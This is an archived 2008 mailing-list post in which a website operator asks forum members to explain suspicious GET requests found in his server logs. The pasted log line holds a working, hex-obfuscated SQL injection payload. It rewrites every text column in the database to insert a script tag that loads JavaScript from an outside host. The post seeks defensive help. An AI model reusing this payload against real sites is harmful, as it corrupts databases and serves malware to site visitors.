To: | semantic_web@xxxxxxxxxxxxxxxx, SW-forum <semantic-web@xxxxxx>, semanticweb@xxxxxxxxxxxxxxx, "[ontolog-forum]" <ontolog-forum@xxxxxxxxxxxxxxxx> |
---|---|
From: | "Adrian Walker" <adriandwalker@xxxxxxxxx> |
Date: | Fri, 15 Aug 2008 13:42:12 -0400 |
Message-id: | <1e89d6a40808151042s1218466ua66417ad160466fb@xxxxxxxxxxxxxx> |
Hi All --
Your expert advice please. On our website [1], we support a kind of Wiki for business rules and facts, written in executable English. The site can also be used as an SOA endpoint. One of the sets of rules and facts on the site is a version of the FeaReferenceModelOntology. We are seeing incoming GET commands like the one listed below. [15/Aug/2008:13:10:57 -0400] "GET /demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 620290 The commands originate from many different sites around the internet, and we have not been able to find out why they are being sent. Does anyone know please what these commands are trying to do? Or are they simply buffer overflow attack attempts? Thanks for your kind thoughts about this, and apologies for cross posting. -- Adrian [1] Internet Business Logic A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and RDF Online at www.reengineeringllc.com Shared use is free Adrian Walker Reengineering _________________________________________________________________ Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/ Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/ Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx Shared Files: http://ontolog.cim3.net/file/ Community Wiki: http://ontolog.cim3.net/wiki/ To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx (01) |
<Prev in Thread] | Current Thread | [Next in Thread> |
---|---|---|
|
Previous by Date: | Re: [ontolog-forum] Semantic Web shortcomings [was Re:ANN: GoodRelations - The Web Ontology for E-Commerce], Ed Barkmeyer |
---|---|
Next by Date: | Re: [ontolog-forum] Commands Sent to an FeaReferenceModelOntology, Jack Park |
Previous by Thread: | Re: [ontolog-forum] Semantic Web shortcomings [was Re: ANN:GoodRelations - The Web Ontology for E-Commerce], Duane Nickull |
Next by Thread: | Re: [ontolog-forum] Commands Sent to an FeaReferenceModelOntology, Jack Park |
Indexes: | [Date] [Thread] [Top] [All Lists] |